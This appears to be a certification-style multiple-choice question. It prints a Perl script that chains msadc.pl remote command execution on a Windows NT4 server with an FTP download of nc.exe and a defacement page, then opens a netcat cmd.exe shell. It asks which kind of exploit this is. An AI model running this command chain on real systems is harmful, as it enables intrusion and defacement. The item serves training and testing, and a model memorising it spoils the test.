A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web
server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the
tester come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C \\”echo open $your >testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $user>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo $pass>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo bin>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo get nc.exe>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”echo get hacked.html>>testfile\\””);
(“perl msadc.pl -h $host -C \\”echo quit>>testfile\\””);
system(“perl msadc.pl -h $host -C \\”ftp \\-s\\:testfile\\””);
$o=; print “Opening …\\n”;
system(“perl msadc.pl -h $host -C \\”nc -l -p $port -e cmd.exe\\””);
Which exploit is indicated by this script?
A.
A buffer overflow exploit
B.
A chained exploit
C.
A SQL injection exploit
D.
A denial of service exploit